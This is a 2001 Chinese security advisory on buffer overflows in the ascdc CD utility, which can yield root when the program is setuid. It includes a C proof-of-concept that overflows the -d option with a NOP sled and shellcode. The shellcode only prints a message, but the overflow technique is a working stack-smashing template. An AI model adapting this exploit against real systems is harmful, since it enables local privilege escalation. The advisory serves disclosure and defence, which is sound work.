安全研究

安全漏洞
ascdc 缓冲区溢出漏洞

发布日期:2001-03-12
更新日期:2001-03-12

受影响系统:

   ascdc-0.3
描述:

ascdc 是用来在 X 图形界面下操作 CD 的工具。

可惜的是,ascdc 有多个缓冲区漏洞。如果安装为 setuid root
程序,可以利用这个漏洞来获取 root 权限。缺省时,ascdc 并
不安装为 setuid root 程序,但正如 README 所说的,"如果想
使用自动 mount 属性,必须或者以 root 身份运行,或者把它
设成 setuid root 程序。

下面的测试中选用 -d 选项测试缓冲区溢出,但 -m 和 -c 选项
中也存在溢出漏洞。

<* 来源:Christer 肘erg (advisories@wkit.com) *>



测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


char shellcode[] =
   "\xeb\x15\x59\x31\xc0\x31\xdb\x31\xd2\xb0"
   "\x04\xb3\x01\xb2\x50\xcd\x80\x31\xc0\xb0"
   "\x01\xcd\x80\xe8\xe6\xff\xff\xff"
   "Would you like to play a game? y\x0a"
   "Strange, the only winning move is not to play.\x0a";

#define bsize 600

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

main(int argc, char *argv[])
{
   char *buff, *ptr;
   long *addr_ptr, addr;
   int i;
   buff = malloc(bsize);

   addr = get_sp();
   ptr = buff;
   addr_ptr = (long *)ptr;
   for (i = 0; i < bsize; i += 4)
      *(addr_ptr++) = addr;

   for (i = 0; i < 600/2; i++)
      buff[i] = 0x90;

   ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
   for (i = 0; i < strlen(shellcode); i++)
      *(ptr++) = shellcode[i];
   buff[bsize - 1] = '\0';
   execlp("/usr/X11R6/bin/ascdc", "ascdc", "-d", buff, 0);
}



建议:

临时解决办法:

   NSFOCUS建议您在没有打补丁或升级版本前暂时不要把 ascdc 设成
   setuid root 程序。

厂商补丁:

   暂无

浏览次数:3665
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障